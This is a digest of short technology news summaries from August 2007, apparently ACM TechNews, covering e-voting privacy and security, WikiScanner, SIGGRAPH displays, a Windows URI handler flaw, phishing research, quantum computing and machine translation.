E-Voting Predicament: Not-So-Secret Ballots
CNet (08/20/07) McCullagh, Declan; Broache, Anne
Ohio's open-record laws, combined with the paper trails provided by
Election Systems and Software voting machines, makes it possible to
reconstruct when and how individuals voted, two Ohio activists discovered.
Two documents, a list of voters in the order they voted and a time-stamped
list of actual votes, can be acquired and combined by anyone interested.
Privacy activist James Moyer and fellow activist Jim Cropcho were able to
reconstruct the voting results, including how individuals voted, for a May
2006 vote in Delaware County, Ohio, to extend a property tax to fund mental
retardation services. "I think it's a serious compromise," says Stanford
University computer science professor David Dill. "We have a system that's
very much based on secret ballots. If you have something where voters are
involuntarily revealing their votes, it's a very bad practice." Patrick
Gallaway, communications director for Ohio Secretary of State Jennifer
Brunner, says Brunner is already planning a "comprehensive" review of
e-voting machines as part of a pledge she made during her campaign. Now
the review will likely include a look at the ES&S privacy issue as well.
ES&S spokeswoman Jill Friedman-Wilson downplayed concerns over ES&S privacy
and says it would be very difficult to make a connection between the
sign-in order and the voting timestamp, adding that Moyer's and Cropcho's
analysis is "fatally flawed" because it does not account for time delays
between signing in and casting a vote. Computer scientists say restricting
the public's access to time-stamped e-voting paper trails is insufficient,
and suggest deleting the time stamp, not keeping a record for what order
people voted in, and adding a paper cutter and shuffler to randomize how
the physical audit trail is recorded. For information regarding ACM's
e-voting activities, visit
http://www.acm.org/usacm.
Click Here to View Full Article
to the top
Next-Dimension Digital
San Diego Union-Tribune (08/20/07) Sidener, Jonathan
Attendees at ACM's SIGGRAPH conference were able to view and experience
some of the most advanced graphics technologies in development. A possible
future replacement for the television may be based on holographic
technology that showed a small black-and-white jogger running in place
inside a glass cube that people could walk around to see every side of the
jogger. Another technology allowed people to place their hand in a box
with multiple cameras to create a virtual copy of their hand that could be
used to manipulate a 3D jack-in-the-box. A special flat-panel television
that displayed 3D images, without requiring the viewers to wear special
glasses, was also on display, as was a glove that gave the user the feeling
of weight and resistance when manipulating objects with a robotic hand.
Although cost is a big factor holding back these technologies, the creators
of the holographic jogger, the University of Southern California's
Institute for Creative Technologies, Fakespace Labs, and Sony, say if
hardware prices continue to fall at current rates, such technologies could
be available to consumers in 10 years. The holographic jogger, known as an
"interactive 360-degree light field display," uses a modified digital
projector firing 5,000 frames per second and a rapidly spinning mirror to
create the walk-around 3D image. The researchers say the technology could
be upgraded from the small black-and-white video to a larger color video
easily.
Click Here to View Full Article
to the top
Lifting Corporate Fingerprints From the Editing of
Wikipedia
New York Times (08/19/07) P. 1; Hafner, Katie
Computer science graduate student Virgil Griffith's new Web site,
WikiScanner, is capable of tracking where Wikipedia article edits are made
from, which has exposed the fact that many companies are involved in
editing their own Wikipedia pages. For example, SeaWorld's Wikipedia page
was edited last year to change the word "Orcas" to "killer whales" because
it was claimed to be a more accurate term for the animals. A paragraph
criticizing SeaWorld's treatment of sea animals was also removed. It has
been discovered that those changes came from a computer at Anheuser-Busch,
SeaWorld's owner. In 2004, someone at ExxonMobil edited information on the
1989 Exxon Valdez oil spill, downplaying the impact on the area's wildlife
and highlighting the positive impact of the compensation payments the
company paid. Overall, Internet experts are glad WikiScanner is tracking
article edits. "I'm very glad that this has been exposed," says University
of Michigan Law School visiting professor Susan P. Crawford. "Wikipedia is
a reliable first stop for getting information about a huge variety of
things, and it shouldn�t be manipulated as a public relations arm of major
companies." Jimmy Wales, founder of the Wikimedia Foundation, which runs
Wikipedia, says WikiScanner is a very clever idea, and that he is
considering some changes to Wikipedia that would help users better
understand what information about them is recorded. "When someone clicks
on 'edit,' it would be interesting if we could say, 'Hi, thank you for
editing. We see you're logged in from The New York Times. Keep in mind
that we know that, and it's public information,'" Wales says. "That might
make them stop and think."
Click Here to View Full Article
to the top
Voting Machine Hackers--UCSB Team Breaks Into Counting
Device
Pacific Coast Business Times (08/16/07) Nellis, Stephen
California Secretary of State Debra Bowen was eventually persuaded to ban
the use of an electronic voting machine in state elections by a successful
attempt to hack the system by a team of University of California, Santa
Barbara computer scientists. The team of hackers demonstrated that with
enough know-how, dedicated attackers could compromise e-voting systems and
fix elections. The machine the UCSB team tested was manufactured by
Sequoia, and the researchers ascertained that the device was both
physically and electronically exploitable. UCSB professor Richard Kemmerer
said crafting the malicious software to infect the system would take
considerable skill, but very little training was necessary to launch the
hacks. He added that the team was able to compromise the voting system
without access to source code. UCSB doctoral student William Robertson
noted that while access to the central vote-counting server is supposed to
be closely guarded, "in practice, it's often the case that isn't observed."
The hackers also discovered that they could modify the machines by
swapping initialization cartridges with bogus cartridges without breaching
seals on the edges. Not even Sequoia's recommended security protocols
prevented the team from cracking the e-voting system. UCSB computer
science professor Giovanni Vigna observed that such election tampering
would not be detectable even with California's mandatory paper trail.
Click Here to View Full Article
to the top
Chipmakers Aim to Unclog Data Paths
CNet (08/19/07) Kanellos, Michael
Processor speed and transistor count has steadily increased for the past
few decades, but the buses and interconnects between them advance at a much
slower rate, creating data backups that slow computing speed. The
fundamental limitation of a CPU is no longer performance but input/output,
says Sun Microsystems' Andy Bechtolsheim. Sun is currently developing a
technology known as proximity communication, which allows different chips
to communicate without wires by being close to one another. Intel also
announced a possible solution, an 80-core chip that uses an embedded
network to link cores that the company says will be ready in five years.
Conceptually similar to Intel's chip is Tile64, a 64-core processor from
Tilera. Tilera's chip is available now, and although it uses conventional
memory controllers, the chip consists of small, individual tiles. Each
tile has a RISC processing core and a switch that can send data in four
directions. The switches form a mesh network that allows the chips to
communicate with each other. The mesh is divided into up to five layers,
depending on the type of transaction. One layer manages cache-to-cache
transfers, while another is dedicated to streaming data. Experts say that
distributed networks of slower processors such as Tile64 can process tasks
faster while consuming less energy than conventional chips. Tilera's Anant
Agarwal says these types of chips will be used by firewalls, spam blockers,
video-on-demand systems, high-definition video, security systems, and
videoconferencing systems. "The processor is becoming more and more
anonymous, and the system is becoming more and more important," Agarwal
says. "The processor is the new transistor."
Click Here to View Full Article
to the top
Cognitive Science Initiative Encapsulates
Expertise
EE Times (08/16/07) Johnson, Colin
Sandia National Laboratories is striving to improve the performance of
soldiers through knowledge augmentation and cognitive models that will give
them an advantage by predicting the enemies' strategies. "We knew that to
model humans on our side or the threat side, we had to have higher fidelity
in our cognitive models," says John Wagner, manager of the Cognitive and
Exploratory Systems and Simulations Department at Sandia National
Laboratories. "We needed models that really behaved as humans behave."
Sandia says they have developed a cognitive model that can predict any
person's behavior by interpreting text about them, such as their daily
activities and travel records, information that can be gathered from public
records, the Internet, and private databases. The cognitive models are
intended to encapsulate the expertise of specialists, improve the training
experience, and reduce the time required to become competent in new skills.
Instead of a traditional rule-based expert system, Sandia used
pattern-based artificial intelligence that uses semantic networks to store
knowledge and statistics. The researchers also included simulations of
fatigue and other emotions so the models would feel like humans feel. One
of the first goals the initiative hopes to achieve is improving the
training experience of new military recruits. "Our hypothesis is that if
we build a cognitive model of a novice and we compare it to the cognitive
model of an expert, then we will be able to tailor the training experiences
for each individual," says Wagner.
Click Here to View Full Article
to the top
Net Capacity: Time to Widen the Road?
TechNewsWorld (08/17/07) Mello, John P. Jr.
The Internet's infrastructure will need upgrading in order to meet the
growing demand for capacity, but that time is still a way's off, say
experts. Nevertheless, as the growth in demand continues to outpace the
growth in capacity, new technologies and techniques will eventually be
needed. TeleGeography Research reports during 2004-2006 period worldwide
Internet traffic grew at a higher rate than capacity improvements.
However, capacity growth has outstripped traffic so far this year. "This
tends to be the kind of thing that's very cyclical," says TeleGeography
analyst Eric Schoonover. "Traffic will grow faster one year and capacity
doesn't grow very fast, then the next year capacity will grow to compensate
for the fast traffic growth in the previous year." Schoonover points out
that 12 years ago Internet traffic was growing at a rate of 100 percent a
year, but that has since dropped off to about 50 percent annually. Some
analysts and organizations are still concerned that demand could still
exceed capacity. "With YouTube and dozens of imitators generating over 100
million user-generated videos a day, today's Internet traffic is piling up
rapidly in a non-stop 'digital rush hour' jam that could wind up in
gridlock," the New Millennium Research Council stated in a report on
Internet traffic and capacity. Schoonover, however, remains skeptical. "I
don't foresee that," Schoonover says. "As demand increases and more
high-capacity applications come online, the carriers will learn how to deal
with that." Technology and techniques such as content delivery networks
and traffic shaping are being deployed and giving carriers better control
over traffic and how it affects the network, Schoonover adds.
Click Here to View Full Article
to the top
New URI Browser Flaws Worse Than First Thought
IDG News Service (08/15/07) McMillan, Robert
Security researchers Billy Rios and Nathan McFetters say they have found a
flaw in Windows' Uniform Resource Identifier (URI) protocol handler
technology that would allow an attacker to run unauthorized software on a
victim's PC and to steal data from the computer. Rios and McFetters call
such an attack a "functionality-based exploitation" because attackers
simply misuse the legitimate features of software that is launched by the
URI protocol handler. "It is possible through the URI to actually steal
content form the user's machine and upload that content to a remote server
of the attacker's choice," says McFetters. "This is all through
functionality that the application provides." Rios and McFetters will not
name the company responsible for the software, though they do plan on
releasing the results of their research once the vendor has had a chance to
fix the problem. Functionality-based exploitations may be the beginning of
a new era of problems that are only just starting to be examined by
security professionals. "It's a hacker's dream and programmer's
nightmare," says Shavlik Technologies chief security architect Eric
Schultze. "I think over the next six to nine months, hackers are going to
find lots of ways to exploit standard applications to do nonstandard
functions." Software developers released URI protocol names so users could
launch programs from a browser, but they did not properly explore how they
could be misused by attackers, McFetters says. Microsoft is working to
educate users and developers about URI security problems, but Microsoft
security program manager Mark Griesi says there is only so much Microsoft
can do and that security is an industry responsibility and individual
developers need to be more responsible.
Click Here to View Full Article
to the top
Wikinews Interviews World Wide Web Co-Inventor Robert
Cailliau
Wikinews (08/16/07)
Dr. Robert Cailliau, who invented the World Wide Web with Sir Tim
Berners-Lee, says in an interview that he did not project the indexing of
data on the Internet by search engines, although he notes that "search
engines do not let you find your way in the Web: they give you a reference,
not a path to follow to get there." Cailliau says the international World
Wide Web conferences serve as forums for the exchange of knowledge. "The
conferences ... I saw as the 'state' of 'laymen'; you had freedom of
expression and could propose the most wild schemes," he recalls. Cailliau
doubts that the Web has changed much fundamentally since the 1990s, but he
thinks the Web explosion transpired too quickly with too many developers
going off on too many tangents. "It would have been better if we had more
time to build on our ideas before letting the beast loose," Cailliau says.
He believes most average Web surfers will not employ grid computing, and is
concerned that most people do not bother to back up their data and only use
their computer as a tool for accessing the Internet, when in fact it is
vital that people know how their data is managed, by whom, where, and with
what assurances. Cailliau says he is not comfortable with having data
controlled by unregulated private companies. He sees Wikipedia as a
valuable resource, commenting that many complaints about the online
encyclopedia are borne out of jealousy and intolerance. Cailliau has
issues with the Semantic Web concept because he feels such a framework
opens up the potential for abuse and misleading. "I would like to have a
good semantic Web," Cailliau says. However, he believes that it's "a
little early to use intelligent machinery. Before we reach artificial
intelligence we need to cross the desert of the half-witted machines. And
you have no idea how 'half witted' machines can be." Although Cailliau
says he is concerned that the future of the Web could turn into the "The
Matrix," he says the Web 2.0 is a good trend that demonstrates its biggest
strength.
Click Here to View Full Article
to the top
Some Day, We May Compute With Atoms
Baltimore Sun (08/19/07) P. 1F; O'Brien, Dennis
National Institute of Standards and Technology researchers, lead by Nobel
Prize-winning physicist Bill Phillips, have built a laser-cooled atom
chiller with magnets and a vacuum-sealed chamber. The atom chiller allows
the researchers to superchill and manipulate thousands of atoms, creating a
primitive information exchange that could be a precursor to quantum
computing. Researcher Ben Brown calls the atom chiller a "rat's nest" of
wires that looks like a science fiction prop and Phillips proudly calls the
machine "a monstrosity." Brown says researchers are taking multiple
approaches toward the development of quantum computing, including
manipulating particles of light and working with electrons. Every approach
uses two properties unique to quantum mechanics: That quantum bits of
information, or qubits, can exist in a "superposition" state, acting as
both a 1 and a 0, which makes it possible to perform multiple calculations;
and that when two or more qubits become entangled their properties link up.
Achieving linked qubits, known as entanglement, is difficult and so far it
has been impossible for entangled particles to survive long enough to
perform calculations. When qubits near each other, it becomes harder to
manipulate one without affecting any qubits nearby and breaking the
entanglement. NIST's breakthrough is the latest development in a
six-year-old effort to use lasers to trap and control atoms as a first step
toward a quantum computer. In the next step of the project, the NIST
researchers will try to improve the process and separate the entangled
atoms so they can be manipulated individually. "It's analogous to making a
transistor," says Patricia J. Lee, a co-author of the NIST paper on the
project. "There is a tremendous potential, but we don't know what the end
product will look like, or how long it will take to get there."
Click Here to View Full Article
to the top
Teen Girls Play With Technology at IBM Camp
eWeek (08/17/07) Nobel, Carmen
Participants in IBM's EX.I.T.E. (Exploring Interests in Technology and
Engineering) program say recruiting efforts continue to improve. The
recent camp in Cambridge, Mass., drew 45 applicants for 30 spaces. Like
the other 52 EX.I.T.E. programs around the world, including 15 more in
North America, the Cambridge event is designed to pique the interest of
girls in seventh and eighth grade in information technology through various
activities during a week-long day camp that exposes them to what it is like
to work in the industry. The girls made "binary bracelets," used a PC and
light detectors to program Lego robots, learned about project management by
playing a team-building game in the Second Life virtual world, and made
bubble gum and learned how to market it globally. Girls are unlikely to be
drawn to technology for the sake of technology, so the program tries to
incorporate activities that show them how technology can make a difference
for humanity, says IBM's Cathleen Finn. The girls gain a mentor for the
upcoming school year who will keep in touch via email and continue to fuel
their interest in technology. Wendy Page, a software manager at IBM
Rational in Lexington, Mass., who has served as a mentor, says the prospect
of global travel can help entice some girls to pursue a technology career.
"You have to get them where their interests lie," says Page.
Click Here to View Full Article
- Web Link May Require Free Registration
to the top
NCAR Adds Resources to TeraGrid
University Corporation for Atmospheric Research (08/09/07) Drummond,
Rachael
The National Center for Atmospheric Research (NCAR) has made its
2048-processor BlueGene/L system available to the TeraGrid, the nation's
most comprehensive and advanced infrastructure for open scientific
research. NCAR plans to provide up to 4.5 million processor-hours annually
to researchers with grants from the National Science Foundation. "We are
excited to be at a point where all our hard work and preparation pays off,
and to provide the TeraGrid community with access to this valuable
collaborative resource," says NCAR TeraGrid principal investigator Richard
Loft. NCAR will also test several experimental systems and services on
TeraGrid, including wide-area versions of general parallel file systems,
and a remote data visualization capability based on the VAPOR tool, an open
source application sponsored by NSF and developed by NCAR, the University
of California, Davis, and Ohio State University. NCAR's BlueGene/L system
will be the second BlueGene/L system on the TeraGrid network. With the new
addition, the TeraGrid will have more than 250 teraflops of computing power
and more than 30 petabytes of online and archival data storage with the
ability to rapidly access and retrieve data over high-performance
networks.
Click Here to View Full Article
to the top
3D Models Provide Virtual Approach to Plant
Optimisation
EUREKA (08/07/07)
Currently, farmers and commercial nurseries are required to grow crops in
real time to experiment and find the optimal growing conditions through the
manipulation of irrigation, spraying temperature, and nutrients, but a new
computer model that combines computer science, biochemistry, and
horticulture provides a much faster and more exact model of plant behavior
and growing conditions. The computer model is the result of the EUREKA E!
2544 PLANTS project, run by EUREKA, a European network for market-oriented
industrial research, development, and innovation. The computer model will
allow farmers to make better use of resources, produce better and less
expensive food, and learn more effective crop management. "Plants use
simple principles of component behavior and they interact by competing for
internal and external resources," says Dr. Lubo Jankovic from the project
leader InteSys. For the project, an analog computer model was developed
using data from the growth of real plants; two parameters, temperature and
radiation, were selected to be the focus of the study. The result is a 3D
model that allows the researchers, and farmers, to see the effect changing
one of the parameters would have on the plant. The next step of the
project will be to create a model for "open-air" crops, specifically
potatoes and sugar beets. Janneke Hadders of Dacom Plant-Service, a
partner in the project, says the group expects to have results within one
or two years.
Click Here to View Full Article
to the top
Phishing Researcher 'Targets' the Unsuspecting
Network World (08/13/07) Vol. 24, No. 31, P. 26; Brodkin, Jon
Indiana University professor and cybersecurity researcher Markus Jakobsson
launches innocuous attacks on unsuspecting Web surfers as part of an effort
to discover what scams people are prey to and determine potential new
phishing tactics. He argues that such experiments are valuable in figuring
out what phishing countermeasures are and are not effective, and
anticipating trends by discovering as-yet unexploited human
vulnerabilities. It is critical to Jakobsson's experiments that his
research subjects remain unaware of their participation to make the results
as authentic as possible. Victims of online attacks frequently disclose
sensitive information or have their computers hijacked by hackers, and one
of Jakobsson's tests revealed that efforts to educate the public about the
hazards of online attacks are inadequate. One of his findings indicated
that people are willing to respond to bogus emails if the hacker correctly
identifies the first four digits of their credit card numbers. In another
experiment, in which email addresses were targeted from a social networking
site that listed political affiliations, Jakobsson observed that people on
the far right and far left were more susceptible to phishing emails than
people in the middle. Some of the people and institutions Jakobsson has
used as guinea pigs, such as eBay, appreciate the insights he has uncovered
and applied them toward the improvement of their security protocols.
Jakobsson and colleagues also launched a phishing attack on unsuspecting
students at IU. The results of this experiment can be found in the October
2007 issue of Communications of the ACM.
Click Here to View Full Article
to the top
Can a Government Remotely Detect a Terrorist's
Thoughts?
New Scientist (08/11/07) Vol. 195, No. 2616, P. 24; Marks, Paul
The U.S. Homeland Security Department's Project Hostile Intent (PHI) has
the ambitious goal of projecting "current or future hostile intentions"
among the 400 million people who enter the country each year through remote
behavior analysis systems, according to DHS representative Larry Orluskie.
He explains that PHI intends to identify physical markers (blood pressure,
heartbeat, facial expressions, etc.) associated with hostility or the
desire to deceive, and apply this knowledge toward the development of
"real-time, culturally independent, non-invasive sensors" and software that
can spot such behaviors. Such sensors could include infrared light, heart
rate and respiration sensors, eye tracking, laser, audio, and video. For
four years, the U.S. Transportation Security Administration has been using
the Screening Passengers through Observation Techniques (SPOT) program to
detect suspicious people through study of micro-expressions--involuntary
facial telltales that indicate attempts to deceive--but the process is
costly and arduous, and is not something a baggage screener or customs
official can do in addition to their regular duties. The automation of the
SPOT program, with computers instead of people screening for
micro-expressions and other suspicious bodily indicators, is the impetus
behind PHI. Experts doubt that such capability could be accomplished by
the end of the decade, if at all, and are skeptical that such systems could
identify hostile micro-expressions in a potential terrorist, given the lack
of knowledge about and complexity of such expressions. Another unknown
factor is whether such signs could be spotted hours or even weeks before a
terrorist incident. There is also the danger that innocents who are highly
emotional or aggravated due to stress might be flagged as potential
terrorists.
Click Here to View Full Article
- Web Link May Require Paid Subscription
to the top
Cracking the Cube
Science News (08/11/07) Vol. 172, No. 6,
Northeastern University computer scientist Daniel Kunkle has developed
computer algorithms demonstrating that a Rubik's Cube in any configuration
can be solved in 26 steps. He says the methods he worked out with advisor
Gene Cooperman "can be applied to any combinatorial problem that you want
to solve." Such problems could range from ascertaining how proteins will
fold to scheduling air flights to playing checkers or chess. The results
of Kunkle and Cooperman's work were detailed at the International Symposium
on Symbolic and Algebraic Computation in Ontario. Their method involved
brute-force calculations by a supercomputer, and Kunkle and Cooperman
devised techniques to store data in exactly the order the system would
later need it, enabling the computer to read the data off the drive without
performing a search. It is the researchers' ambition to reduce the maximum
number of steps needed to solve a Rubik's Cube to 25, although many
researchers believe that a Rubik's Cube can be solved in just 20 steps, but
no one has proved that yet.
Click Here to View Full Article
to the top
Translation Tools: New Approaches to an Old
Discipline
Computerworld (08/13/07) Vol. 41, No. 33, P. 30; Anthes, Gary
Language translation software can greatly enhance productivity with the
right combination of discrimination and preparation, and researchers say
new translation strategies are augmenting tool performance enormously.
Since Ford Motor started using machine translation software nine years ago,
it has translated 5 million automobile assembly instructions into multiple
languages. The process involves the writing of English instructions by
engineers and then the parsing of those instructions by an in-house AI
program into unambiguous directions, which are stored as a record in a
translation database. The Systran software uses rules-based translation,
which utilizes bilingual dictionaries mated with electronic style guides
featuring rules for usage and grammar, along with "translation memory"
databases of previously translated text represented by source and target
sentence pairs. Meanwhile, statistical machine translation "trains"
software on collections of documents and their translations. Large amounts
of documents are necessary for statistical machine translation, but
grammatical rules, bilingual dictionaries, and translation memories are
unnecessary. "The new direction in the research community is to see how
you can combine these purely statistical techniques with some linguistic
knowledge," says Microsoft researcher Steve Richardson. "It's modeling the
rules with the statistical methods." Automated translation software is
most suitable in situations where translations are adequate rather than
perfect, and Richardson believes practical translation milestones will be
accomplished through the creation of systems that are embedded within the
workflows of user organizations. An increase in translation system
sophistication and complexity is being facilitated by the combination of
complementary rules- and/or statistics-based machine translation and
translation memories, according to researchers.
Click Here to View Full Article
to the top